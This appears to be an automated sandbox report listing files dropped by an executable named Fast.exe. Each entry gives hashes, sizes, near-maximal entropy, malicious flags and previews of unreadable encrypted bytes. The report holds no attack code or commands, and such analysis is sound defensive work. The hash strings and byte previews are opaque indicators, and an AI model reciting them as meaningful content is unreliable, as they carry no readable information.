    SSDEEP:192:CKMr6PT/Br7KE3Dfl6mZM3fFYEzjK5AXhbj9+TqrJWJMUDnoKDo0wA:CKC6PTxFTN6FYWjn9rJWDnnwA
    MD5:278AF8CBD886E74D8123D3821CEB7ECA
    SHA1:E5DC58FC8F07AA32D3D72EA99247A2B54A88AB67
    SHA-256:88A2AB6B9BFF31DEC90E70CFCC1A0C9C2A1EEB374D24E5930306E128C0F5C1D7
    SHA-512:D1DEDC388B385E0BDA3CE5C5FB25BDC5D0EA119D0D4AA93405CBCF3D5D38000016BD7F543992E9489E0F951D4B0ACC00475BA3A1E8FDCE2C227BE0A9C9F58E24
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):13330
    Entropy (8bit):7.985935356552536
    Encrypted:false
    SSDEEP:384:ze9SrwJ2xjwRjX99Iocdtkz6qa5WWsLhm9T6A:zySsYa9bcd06qjLYT6A
    MD5:E7A4A42CA03A71433986610DB2D2E994
    SHA1:06AA574AB15C1E645BECCC9A772C04C8C5BB4EC9
    SHA-256:6CB0E4053060EDF71F6DC19A4D68B1FC3570B8A3985A753CD9174F51C51D8445
    SHA-512:39F21A7D955AA11CCF9D1F3B9036D5A16F950DA06ABF2670727377BE5F99FB5C0833A349F77546BB3BB3A05F5A3E0BE99BEA3AAD5FF0459F3D3FC8AB3AB6E6F5
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15266
    Entropy (8bit):7.989001453756689
    Encrypted:false
    SSDEEP:384:rRvRhKoQLf3QEOYqjS6qKQ44d1KWbLsEolXZwA:rrhKPfAE5qjSumL6pwA
    MD5:CE3E4151561A484982C65F908C52DDDD
    SHA1:39AF761F4494C06C8F4EB0E919E2F4FC979F465E
    SHA-256:A9C27660A3000FBE9489E2B97DD2B7E50E9411EE279307163C54B41C9C129C1D
    SHA-512:A4125E3AC4808D308249B98B1547BAC28FF71E72A227FB784B702C3CE6E592D0614EADC7BA63FC36075644EDD8E900FC6DB5FAE74C4A348809445378A3B953E9
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5586
    Entropy (8bit):7.960522819442022
    Encrypted:false
    SSDEEP:96:JcJ3hGCDDaLHYNnpOadFKcQ1YwP8PYitFd4Pk1xA:J63hGoDE4iDcqVPniGyxA
    MD5:8625EB82A1FF76C7A7B03C117B379039
    SHA1:1604787B3E1CD0C3F03191718E1132007B8A2F90
    SHA-256:863159D1F1659F9FC1DCB15FB38C8DC035A740C106641C17E842A519539BF938
    SHA-512:44EA4C8EDD9A7860444022EBC980C867DB61AD171A97F1134C1AFDE29DB69B891FDB627D17CC35C931CEA62B16D0C078DBA78E285C0A46302C616C1623A70135
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9538
    Entropy (8bit):7.980935283650416
    Encrypted:false
    SSDEEP:192:NoWQ82EUUAZ83abo+TKUtkQKJKoE5FRjg0j7+XG+n7VrfzJ/MDssQrnA:Na7B7Jo+TL7gDEn1gAStVrfBMjQrnA
    MD5:F005B13BEB8303C9E2C0BB3EB52B3C10
    SHA1:D62B7E4F80055CD0C2AFB00E2F43BBCB04726307
    SHA-256:DC740B467A5E65AB1681ED4AB4D5AF604F07048176ACDDE8B914421D935E7794
    SHA-512:5E24EC71DE24AB98B73597F2C3CF17BB33E229C5B910BBDCEFA391178E35EA61C278E2A0AF9D65AADF39925CCA30A3435F3EEFA83CA82D601F0C48AC53FEA9FE
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11186
    Entropy (8bit):7.9815151681910095
    Encrypted:false
    SSDEEP:192:B9xgqRh3kqeu6hXNGLePHB1CKt6TobsgZEktlVdApjXg0EKlv0F0qQcA:DJL56bsgZEkss4v0CfcA
    MD5:BD5FF96905CB981D6C796014F2A6BF3B
    SHA1:D01D739F936C72383E52CD73DE8087C23F97F4E1
    SHA-256:ED7E1AB613439DACD3FE7B47043E35C5B66E0CC5AFB7D3733A48675E1A3E924A
    SHA-512:34EE0D1BCC9D3534F6DFAFA178C555E9E604DEF1F9DAABF2EB9B1F5D4A66746B10695D0063F941A36A63278E026DD23A247B7FA2DB77F486AE5AD10F0C01CFB0
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9378
    Entropy (8bit):7.978240850911514
    Encrypted:false
    SSDEEP:192:WAvK/OWu4TLLrbUPKVbEeZH8DUr7KTlBoVVEoVI5TRGlGxNRvreP/lA:TShJLHoP2fxFr7KOVEom6l2vqP/lA
    MD5:49DC6F6A77E8680E8129EAA108C6CEC7
    SHA1:E693CCE2484C47C1A38A0A5E4F0C53129154544B
    SHA-256:A3DEE7F808C1807978612FE3BFBC9C6F3D40B36DF0309EB853A3EDE52E2173C1
    SHA-512:8042568F7E3771F27EE8296A6A246D79FA655075B980D607F499D6B9A6AD263D4302F4FFDD88590858C2D7A42598E8A46DF4B745585B36694FF4F531ED682C41
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:OpenPGP Public Key
    Category:dropped
    Size (bytes):5458
    Entropy (8bit):7.964213594076986
    Encrypted:false
    SSDEEP:96:pM99CODb0PbI7HKh1tY4YwtXXFGwFcVh4X5LrKuMzs96YYOY+768eOZgiHA:pyFH0PbI7H+1t+E4wFsh4X5Leu0UHWMA
    MD5:9D8661CF10E0F3420E3F02A2E306AB20
    SHA1:C6A745A98C46A20A06D8D8CE48CAA9E8E8A79EF1
    SHA-256:C21DAEBC19CE3763106379F02C2E11637544A5CB2C2DD1FE403B857AE48E3697
    SHA-512:4A07096F7B7DB2669C2C0D43F08C47357700122903D3A064FA37922A1015DC364851C691CD02FABE2C4B9ED40BD0FC7B04022230657B1677A6FF7C38C5EBC1C6
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8594
    Entropy (8bit):7.975452474798151
    Encrypted:false
    SSDEEP:192:ig1OakHk9RatDTHUThS19T8vv9ZTGx7bMq6GGWJY8sX8kuUA:igWHkOdgThs9TyZTGtbMq6GFJYpX8kuX
    MD5:1F83679AC5691741591674CE6EBB56BF
    SHA1:F409F9D8C665742093A2D1095CA5B3977C58C98F
    SHA-256:07A05518327B133928D9C46C3A95D7D713286315134DB72B8A4E079889F8D869
    SHA-512:EBEF462875B6BED353D55E8B459A19E736E31C93294F7D8A153E3CDA0DB27D92C1005CB1686D040D40D88D239273477AB8570837263AE844606FCF4749D98F5C
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9794
    Entropy (8bit):7.981243426872218
    Encrypted:false
    SSDEEP:192:hW6S30BVN13AzsBwrf1QBuVl2QyuWOSI8iFKiJHaJ2uFTcytmVLPzHA:Y10Tw7f1QUVl2hLOSoHoZ9cytmlPjA
    MD5:8605BCEED95F81537D3D4D4E0858F475
    SHA1:DC5F25850A38F9DA3D567B1AED03F058BF0DC8A2
    SHA-256:DAF177C645F195C930FE550FDB65D247D523F9FB5D4EDA753151F28E49FD6199
    SHA-512:44BDFA970E5262791002D32F928DED2E0733CDADF3298A5083CF30F024EEDF46B3D5841EA8FD9C935F14DEC7C3750247AD424DB56A9DF972A623D58AB631406F
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):17138
    Entropy (8bit):7.988164364174954
    Encrypted:false
    SSDEEP:384:g8FqxNWRaETCPD+zvWtD5pOPEW6qORZ8nJSr9zDthiZfAWgBNA:g871+PDQuZ5QORenJSBGCbNA
    MD5:50FC599585AEA641B8DBF785C9E99A06
    SHA1:7C75683390B913CB71904364D29F030AC5F6A4E7
    SHA-256:50BF58980B6E73A096708FFC330223BD41B26255801537EA1598C046EE9200EB
    SHA-512:4B6DDED3DCA2B71D81DB9BB12184AE411F7759C7534BB78E7C53C837E5417C85158FA251951CAB4085A32A5E9D269E9ABE602C0CFF2500D73E9255B21F15DFB9
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8146
    Entropy (8bit):7.980229942594748
    Encrypted:false
    SSDEEP:192:9p9mBk4au56chFsNFtiENSqjvfBdt9kLZgQ+zgb0uNJA:hmSrubhEfft9kVT0SA
    MD5:20FAC53D96B85C617A63526B8A2A8A1E
    SHA1:29528A82BC77353A465D7A1DCC6185CDA037E679
    SHA-256:8E7FCD237E4472640192817335E0562C4CCEA4718E268A5D7D0DC6CA8E4408AE
    SHA-512:53767EAAC7F56C73E395A45178EF3D198E383CDEE34079CEE3C1FFD5551B88EBBF80730F3B10CC762935D2D64C2B29E9C71D100F78508C4464A7A0221E2E8408
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):5490
    Entropy (8bit):7.963614284464779
    Encrypted:false
    SSDEEP:96:0WGQKdLULDZxGRej7e9wlWftRfImCCrq8cVpLKwmkqMik2aKLDUeaA:0W3LVgU7e9wcfzITyq86Awm7Mik2bkA
    MD5:95FFC0A9C6D38B4F7BA28DD620DAABEE
    SHA1:6369A5A391DD5838F9E7CD6593DACDC6008A9CCC
    SHA-256:67EDD223CE9F327153C3799175ADD2FF02BE86315F05D1A31471174CD48B47D8
    SHA-512:BEB54E30085E15F54913CF6D6234141769DF00A4798E456364ED15E1C6C8CC5574BFFCF3F034ED3134C34D94267848422DE6965E06A0F109E7539324BDE9A7E1
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10274
    Entropy (8bit):7.979052722796463
    Encrypted:false
    SSDEEP:192:PAgL5+5bV9dYEozXFOopf+JwIz/b6Hg8dhfnmFADFh8EGvcCA:4kwh6zXFlVyPMg8rfnmaSbvHA
    MD5:7A5996B82931D51E0801264EFCCE9D10
    SHA1:006B96B9C4808ECEC5C1F9012AA69EBD30057B5D
    SHA-256:57AABFBC90B7CCB14683D7542261186C306EB5C0DE40AEAC171D6DFCF681E1DF
    SHA-512:11AAD3EC70CDBD4A0E84B3FBB7A1C4FB0DE770662BD34B0079062B4E5721FB2C201E40515A94D9A07A18402DD58BF349D26BADD1A2357EB3AF2E41EDA7BA60CD
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7298
    Entropy (8bit):7.972511181357166
    Encrypted:false
    SSDEEP:192:zQuZs/NWJcbQopK/h59EndIOP27HNZxy+8y5woI7HA:+af0yhodIh7tT0yqoOA
    MD5:A059C108D9A50AE8E1600A68230EC7E4
    SHA1:0F2F6A7D74C8CDB48142DE206C783FED3FD96370
    SHA-256:1D09493F2A8E09848301A287AB5F3D7BF1EAA3745A5C6E33030850908FAFA291
    SHA-512:8DEBD73EA62B091FD59581A187786CC1DC0D0EAF3633B938AB6B0F41F79FA2175D24507D54B198EC9776882A1BBC3810557DB0F73E6F1ECD62CDAB21EE855C7D
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9122
    Entropy (8bit):7.977654082639977
    Encrypted:false
    SSDEEP:192:mu8pdCWhFGD1ZagtmTbhYMtdbMaNpgDi7qLxsISHB0A:mjjCH1ntmbhTfb74xs3h0A
    MD5:90776CD24C57F53C889E03D4B1BAC397
    SHA1:7E2E62D371299D1903E5BB1B18E5B01C3F3D6981
    SHA-256:BE971EF0DFD7E078A26EDEEE9BF09561D513182FD9DC2DE05BC235BB8EA5BF13
    SHA-512:9E0675932A6F9E579B1E739C8F9782E0738CB305CE525D09C018B3CD656414D52F0E6A5AFB23C4C8F41FA45C267EE238F9EC7A8C19C8E03C177823DE824EC14D
    Malicious:false
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7954
    Entropy (8bit):7.97481492670714
    Encrypted:false
    SSDEEP:192:HrWL+XyRvwLfYsHImHc02Se5D5XlZbZEZDRXe4IbA:LWL+Xywf5HImc7B5pzZEVRXe4IbA
    MD5:BCB4C065F031B0A432AA4B9DA6114C6F
    SHA1:580F471FFB0F168C141555D5300C424A227AD2FB
    SHA-256:9CAF57919A50DBA74C42FAF3C2857360D1E764F337819E829BA7B35521DDD7CF
    SHA-512:3E31D40C515DB67C2846E26FFAB56F4D70BA95D6C5AD9CE6B2F954EE5CF329822B33C900301256FD72992AA33B5A0124B65DEA8F85C28F69B2907E0256022834
    Malicious:false
    Preview:.3.w..2..'..|?.>....lu.."p... ...8/0.,.@.6..........n..N..B/....>CS,I.O-l>...g.nV....,..-`.P....?,..h...i*.:4)....t..Md.....#...n...d....*n..c.k..;...\...)~.?..Y..%......{..|.R.\..+.?^...#9E.k.L2...$G.W...S&.3.+i..XY7.(...f..Sx*8..TF.o....%..h...U...,.....W.L...zk:....*.'Q'p.T/.A.d6.......Z..z...8.A...4.mkX....)..".[.5.@.8..iP.!$=.js..,]YF...g..../.%.py.M...7M..K...rw..j..u..#..K......r..R.......z.F.uw...j)....%.`%%d....f...V..bO.me*.u;..&.o.....{.d.zJ.r?;v../.l.X......=...........p+4T...&...@.o..b.`..P.....4l...f..KX....z.;...f.,...s.7*.b.[w....9..:.......R|.....^p..\.s%u.&.0U./.6o..z....t..J.;.:L.H....R..A*b'..4.`e....}...<rIz.............-.d..1G.6.n"".sd.."....s3..'.7D.n.Q0..em....>.H....>J..0......\..............@.rkQ..r_t.L}KZ...,..cg.*...&....7.x.O..F?....../#..u.t.QB.....&y...^......^......J.3h@<|..*....l~x..{..RV.HT......t .1...J.o..3:!.H.....i...{......t.F>D..+.a.@P".......0.....k.?9....KNMuk.%t..#..;.y.......y.....r.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):14034
    Entropy (8bit):7.985320642064902
    Encrypted:false
    SSDEEP:384:gd7HbFnnug9ch9/akGSsbpgW2c9T1dyqUqlA:PX9/vsbBNT1dyqUqlA
    MD5:A865555CA3DEA9D8C0D8AE28036878C1
    SHA1:30D8D06A14741766B3D515BDC6041A226B93C2AC
    SHA-256:B967100FBD4A78F2E700E2DA7AF23E6D1F47E5BBDD38B7FB71CB5D6517210B5C
    SHA-512:268C82208E91876C8FC3E76B89185A8192806FD38A2B2453D7EE0D31A0B9B6AD6506EF1DD804249F59773EC554E5C75AAE375F019B4609942B68ED1E4C69724F
    Malicious:false
    Preview:..i.fFq....<..{9...yb.j..W.-..aT.Xn....+.l.7..<....(.:...3.....se..A...x..0K..+....)b.k..@..~f$Z.*f...].p6....vb.(:pzk<5..=.J...8.A.jt..j..3d}...`.mDr.....)H...s.7d..j.p]Y.z..J\z.6....2......'.)..e......&...s&....ld.....{y........&....n.l]};....$....I`......`#...=.R .....K...~;.Prd.P.[..-.Hy......s...........{.D.s.....k..(...ku.3..3b..t....;.....e...*.I.|*2KR.u&..X%..)R*..<.......q)......V.......<.Do.....f....E..,.0 ..8...e..-...>.hW...Vy...FN._.\...N."4.'...1.,[.+&@.("X.........3.Dbg.d....?7@.(..n.&....h$9{>..QCn...r..v].C3w ........l.}R.*%F......:..0.gJ..G...._...U.......<.j..8..h..........n_.G...s...j...;......N..(...,..PX... v.^.BT...W..*i*...Z.+r.(.!0t....c....~e.........A4..t|..gH....jY_..m...|I..Q....iy59....B.2L.....X...X..e.k66v...'..\u.....H.......!....V,......WF{.U...._.0X...zt.J.i3.-]QC..R.[.6.e......Te.@O.oZ4..q.i...7S[.M.:n.J|....._..c.8...Z:=..i.[P.P....-< .....k.....:....o..0.....X..8ee....I:z.t1|.Q.n>..!.(..^...=m0b.j..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9266
    Entropy (8bit):7.978718516175339
    Encrypted:false
    SSDEEP:192:NTAwdXFwo7Hdri+Dx3KPltcA5LveCgOC9d0tY/3dyEfNxVxLyBXo0A:51dHdr7xKdCA5LEsu3dbv4BTA
    MD5:A31391FA737104EA87C6F34E5F962431
    SHA1:1165A9CB9CBE7FF0E2B08133EE0DFC504B30AF2C
    SHA-256:A7006A94724776B4E4BADEC8D5D32D59FF43BF2C23C2BE194E64A8E2CF1693F8
    SHA-512:F7D7BE0AD30DBF86A64AAE7BAC3378B935FC03108CB6520AF3B4205FCC4C3F1282DF536B9CA9338B50A4EA273F85B3FCCC02321889E85C3D65A2EA6EDE008AD6
    Malicious:false
    Preview:.Y#E..FrI ........Bh....|.e..=......vw...-.].e.....!.N.=.<..7....K.=%.U._x..p+'.*r.....1.oEbR;..I.^..W7...t}.).F?.....(5c]..5.!.0..g...T......~....<D..P.....p....(....#.L.UY......bmB.;/)..._.)..k.+.W.......}Y..i..P.4.l..s^...Ch..:2....u..t...P.B.....,..`O.#=.t...|.U.VN.'@../...+/z. .K/2~>...D...*...s...f.`4...7.Ex.yT6.*.He3.6.?..eZ9c..iq....x..Be.tfp|=l[..9..R!.~|.%0.H.t...(v.7v.(...{K.j.]h.....z.....++^d...m.U.m...'R....n..c.:.s....8Ftsi...H..p3.L..,b3..."_h.L......o.(...N.Rx c.s...D-........fo.6.../......BO..S.}".d...3......]$v..K(..!....4.E.+l.F..&2..v....|..n..&..ww..K.d.i.Ayy$..r...=...Y}l.........s........?V{SZ..v".m..l2..C....!c.(....=....$4...o~L..JrG..d..j.qU...sN_.P...g.". .....E.F..........M.Buc.*5.-R..+3/.........C..&i...6.J.viV.2......p...2..G..$.V|.l.).&.b?.\.....8..t.V.l.g{X.r@.....:...2....&raN.=.;f.......+..Zw"...>..Tt&'......,d.6...E..@d..,l....#....s..`K...t.p#Qo|l....Ee.pE+.l.Z......i...vynuo"b..ZM.O...)xT.....UJ...G
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):10146
    Entropy (8bit):7.979764151880745
    Encrypted:false
    SSDEEP:192:PmbQPFbl7o5DCsWZ7jljY0bDcNM9u3nRvh5U3XLBdJ86lLsugy8eREA:+bMbA2hZ7jljY0bQq8wBdG61Pgy8HA
    MD5:BF2A174EFFCB36E8622D9E46777B6135
    SHA1:261444A4E062C318540C6715D8922C2C90C4739C
    SHA-256:C6E40A09160B2107D7D3878CA6C16D1ACC3B6BDB15FD4FC4A20E0027F9BE48E9
    SHA-512:A6293B390D4D57BE94277180263CE8C970F6054A4492085575038DA87BC27326A06F6481FA146439D362B72921790F268C76C02BEB6FB0A6831BBBF1119181A2
    Malicious:false
    Preview:X.?.A8.......S.....(...S.L....n.|^..d"(gs,YJ$...zh......_v.. .r.gu....P.9.C.....#.nMq...6g..V|m=-e2`.X.Gl/....zby.p..`.....D...t1.lIYi...T.]..#.`6.;....x.F.mk..l.@.p..2.tl.#8....u...K....m.k....T...y.l......5.wg.~..w...-....B...?|w:...;..!.............p4..dQ......}..#.G.yz..(\.D......J.g.....UC.A.x.c....y....+O....s.x.V.gv..3....X..|gU.O...4.E.5.N.a.`.Fp+.....a..B....j.<mj.|...d..mG..U.v.Z..tp.7$.....S:=.U"...@J.Ba..>......m..pz......v.R+..m!.=.h:]...Q..}.-...<~N3.....Nu/..^..y....`...@..3.......[..'.9p..<b^.!$B.!F.........IB)..7;...,-..O.A"S.*.m].....T..?OL..:y.M...Y...Wskv....%.-*#.4.a7%G~.t.h<.x ..:..].pnk.Dr..:....n_~..[.G5...'.J..1.F[z-@r..Z.........B).*tS......"...l..~.W.i.t.m..<.....{....N......+.wS.K.....n-..;.......0.....@_.....s....[3.UXf...&)...."c..L....Q.........k......d.nT./..j.(.e..2.3.tk#.A....lMP7.q<=.".[,..n.J.].=...Q.]<.s...1.2IX..?....6.D.}..P....T..fr.:.=..3#(.P.:......ZGq;....J...(.&.O.V:..c..@8...}..I..Xj..X...o$.B.Ip...x
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):7746
    Entropy (8bit):7.973326406364096
    Encrypted:false
    SSDEEP:192:Ve+l1z3ZQCZrsp502TZrgqRAeTSRkpZxHRoj8xM41A:l1jZQCZrsp502ZsxkVHRoAxM41A
    MD5:B01F2BFFEBA38691270B5CAE79F04D3E
    SHA1:AFC7781899C7D99791828FD20A663432A35F20E0
    SHA-256:C6E384829D51DB1EEC7DB07244DA9820B69D6B58C845EF1BE9D82F65DBA2FF21
    SHA-512:6DF26191A4865F5F57E306B5A6EFACC0283D4C7C9EA941F5C89F1614DE7FE498251B2EC1175B5C30A387B5850166E245B82DA87AC708079FD739ED299E6A29F7
    Malicious:false
    Preview:.Z..,....g..i.[=.....Q.7=c.[....X...hH..h.l.Gw.62.Oq..%......\...I........(,..}.1..-..^......}.8.g=T..&.,..........+......t.......KI.v.&fO.P..xu.s......<..U...?W.....E.h...g..d..N..i...w.}2*....{Qn......n..o.....:..vD....5o..9A8..b8\MbW3.-.d....'...Qi.....a.swt.*.n.....uAL{}].,...S.-.+...zW*s].......@A.GzK{C.]c.../..L[PnM......a*y3.n.!..%h.D.|.&....f.}9...b..J>.....|D..sEtSE`.'D.V.Ca!Zj.c,..3..K..%.....Sd:lKrrs....8..0..'@..K*y....aj.].:$m..>PP.A.'5....#..=..fmF..K"W...; c+*.._-....V...8.C....o....W%.....s.n..f.F.....09Q.]....[.a&6...4.[..#..o;..r0.lA.2..........n.!m..0El.28m....~....k..Eb.+.]...%T..?....&-.48.......g..".Z....zru..=.@_..^>..8.) .n.t..$.,..3W....lW....q.H.2.XoD...]..ZK.:_.kk...](.K..o.....T......v....D..y...7........Zv..pf.|....,d.B..k...V. ...]q/..^..?..ih.-...$../X.%^&V....a.a(.q...|.j..)....S.......L..g+.h......$em.{...KN.#...Y..U~.R.s.b..x.e..Q.~12..[o.y...4....H..mt.1)...$..o9h.Gr.Yc.S'.X......5.i/.7..s...~.=$..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6674
    Entropy (8bit):7.9747976731697525
    Encrypted:false
    SSDEEP:192:RxZAu9r0wtR6uZZfD5mMV647Ew2P3tgKg3aQ/wQ9VIa6BseH0OxHA:HbgwtRhBmMv6qh//tInseH9A
    MD5:87AC9AC6402FCA3E17947D608F450E93
    SHA1:66A716A22BE6476E5DD32C10A575174DE0EBE2F3
    SHA-256:86E789F16FEEE311551ECC3A5E8FAAD35DC95A557941EDD0582FEA48AAA24C65
    SHA-512:0996972F421F3439418DEBDBAB4F26BC2597DE3184EF5FD0EAD39A43201ADA5388134C10EA8DD33D4820C94D3B8C1A88043C318F03F3B8FC57A5225800B087E5
    Malicious:false
    Preview:b9..a..L....%.B8..dK.;...?7T....t ...`...}B?..z..IE?O..K....&..{.O....*.....w.1..... O....2....../...e.`..4.....2.q ..zpA..`p...+?..`6..3.*...Q...W.>N.....zTw...Z...n..p..~..}W!..?P.......+w.".\..U..d...1...k....y..j|..I^..]P6..K.?..Cw....Q...Z...@A.t..'.......Ba|.(....6.[...HQk<)..h.4.....3.1...?.Gb.Wh.T.:...E.....!.|.6....k.. .p.D..<......0yB...j=RQ.5..58RC..L...Za....)f....Gzp.A..M........%l.s4.\..I.@U.A........H..../.Q..'...s}q......../....:.L.S...1I.....O...|.....q...l.e}vj...:.#..+.l.U......y...RG.l;..\.....?.^..@F..T0.....#.....v..3.?.@>.p>0....NJ........v...2.......~&....<.....r%!........t...k..a.A....KBWD.Z.$...P..6,MX.3!1..$...ja.f.....p...c2.-{.....fQ...n.xs!.0.f.%4@...o.P.N.L@.j..{#.9....$MQf...e>.#.;..cH5...0j....n..f..p.l..S.......9..o.......hE..<.....".......S.."j..0..Qt:n.,@.H]..+D.,..{'.......9.D.b.l.....hDW.".........<.;m.{..b.F..!X".v[.#.=.T...n].8w..u\E.?+...RS.-(.SG...1(.>a47.p..a.G.~..}..'....%....*.a
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8546
    Entropy (8bit):7.979961054280646
    Encrypted:false
    SSDEEP:192:9Oq2RfY1oFwsRwsUvq+Jwxy7kYLjtGysOnQIhf28A:eRmoysGsVA0yHPZA
    MD5:8D5F9EAAEA02AC3407705CB0372B22A6
    SHA1:95BC6E9C59AC3964DB7BA4612206BECAF267CD07
    SHA-256:6B7E5EF01D94401D8FF56818AC7C2D719443273AC8E74412241DFBC4B06630CE
    SHA-512:DFC84FDEC9B12E9F93F8BDC1C56C188D866BFE3DFB6A9A1FE84DA64E8660FB12150E076E3FAB6DD47EA1870AA6D54F46BF60E88FCB7DF35E95495E3AD080E208
    Malicious:false
    Preview:LL..~.....$...d......h......j.9.,...7.g.M...AOGB......hv..Y.Um..D;.(..9&.X.O...E...E.H.T..H...).....a...b.k..b[v.H/t.F..........e...k..k.s.!t.+.4t9...`..,..Df.u.....Y`...gR..%..P...e...adEgx.mB.3.a.).V6...;..<].".H..G=>$.............3.....9.....WG......8.#.e{.4..h..>..[...../wd}.K.`....vJ~m....N`Z.......C..Y.f....2.%.J.J9..f;.(...t.}I...Q6...C.C...:...iyLQ(...c....~....A.....y...DN..w....5....UY...KS.k...\...h..h5..v......O..w.S.a..tP..{..p.Ow.6..\..........@.&0..H.}......~....T..(...ql..........k.|.`..Wp.7CB..?...fr..:....%.8...lk.f|....M.. ...DO. .?.v....I...M..l+...&.s0...cI.w....#.<!*(.....3.:.R.q.343X:I9..!.+...........SJ.@O.....Z.k.(...d9.)......<..x.i..7.Q....@.[dT..4..T._<.>.....B0f...T.}:.!.|....hX.!..3.I..c../..cK{K%.-.|...W7+P.n.#.{...]....%.O3.-..<.Ar|.k..P>.*l.E.s...l*..Q..Y....t...~../?.`<)=.5..O......h.C".......YV....w.....O.5..Y.....2..o..oZ..Uy./.......C.9.J.}i,..6..~7%.77j..7..R...y.$..Lo...%2..u.......Bh..}.8
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9842
    Entropy (8bit):7.979345793661522
    Encrypted:false
    SSDEEP:192:FwB0OtL+5DyF2/rFyEjrv0rHJul1miiZlSNnezOAAjfWvIB4usCJeeA68Wn+4A:dicyFuJyKIrd7SNeiXfqDL4A
    MD5:960A40B2D7FEE4AE04DB8B28E685A66B
    SHA1:209BD71103B0491A8E8AF4F8E15F9C5A66EC93D4
    SHA-256:5E9ED4EE071D1EA6B42011257FC23FD1FA61D09965154C9C1558C07839F36AA9
    SHA-512:4C8C98CA6EDA43E840F46B621D30553F99B85DF13305A6877C8F428154CED52A4296632E93E6DC086AA5121520784D8E6D89D6B4D7B127E98A9620FBF4002753
    Malicious:false
    Preview:.d.......-.=..e....@..m.M6...U4e............S.<.8o.C...fe/..~7?.8m+.9.....M*.".Z?g58.y.4..W....XKP...+9S9{.U.$..$..D... .5.*..*.].,]hx....z$K.^).Z.Z.`.yG0(R..k.2O.9.I~..l.w...LD..x).....;..1{.w.....BB.s.4.V..l...P.$...`.....7...N....S..A:..qKb..K....#._A........8pS..f8..sd.Ga.I.n.Z..gNh.....D1....+.po.....*..b...y.0m. . .r.mr.....^..F...D..`.....).h......p%.....q..M..c.zpi...K.>..EQ.;.........).0.[<.].z.G.|]....i..%.%...{...t.5.......a...*..~Z...<c.0.i.c.0..i......0z..;@.0z..r.+..9)~.O...tpu..<.J?....=..+..o...nSP{.=M..7...8*..y.......|...W......."./o...R..y..14\.f.%d...d|....... X..k..%4..X.&........H...z..K....1..r.j.Em..4...HC..6-.....dS...>..I..-IC_..........}....{..:..{..*....i*.w..g...w.t...XTe....31&X:...?`....?..0/.B....)?"..G.k....~H2..........^."........%36..........B.I...=....R9...e..{......D...aBT...=P.\.c..O%...<e..(^...1..P$.......4...&...k........."..E.UhzV......u.*....2.K_.&..#..i.!.TD...D......c..:..]|.`N......i...X..5...
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):18002
    Entropy (8bit):7.99009959487427
    Encrypted:true
    SSDEEP:384:O/fzkbQB/07AxPyIKKysTDl2kURQYApMdRPZ/ARwFcrAaidJTjlA:Iog0UxPrKKZJPwPZ/AGFBaidJTjlA
    MD5:BC0A1BC355216782CE120A15B08D231E
    SHA1:76E294989F682647F37ADCA13B9B2F7A7C098AE0
    SHA-256:4E2C186B890FAC76CA0B116B22EC5E18085C21868D0E25048D4104D7997DC35B
    SHA-512:74961FFE9057E20A4A863293E3458E8A065D9C09D27E4CD2B0381515DEDDB8D4FCE3CFD6D6C8C3D0F2B91B26E9D1168D69CF901CFAE01A4F22176BA2CB09D0CD
    Malicious:true
    Preview:...d8{|b7...dJSWrb7.........z.>.....J..\.+H..v....3.!.D{..^....<.....a..D.^O..x.c.P....6..j.........g+.&..B...;......O......._)....}...k.......l....5d..3.P......o..R#c./....c.B..D.#.2K.m...WI...L..... ...U.....[..E.(,j8`.X...0b.^..8u..==...I.,.FxW......mP|..% 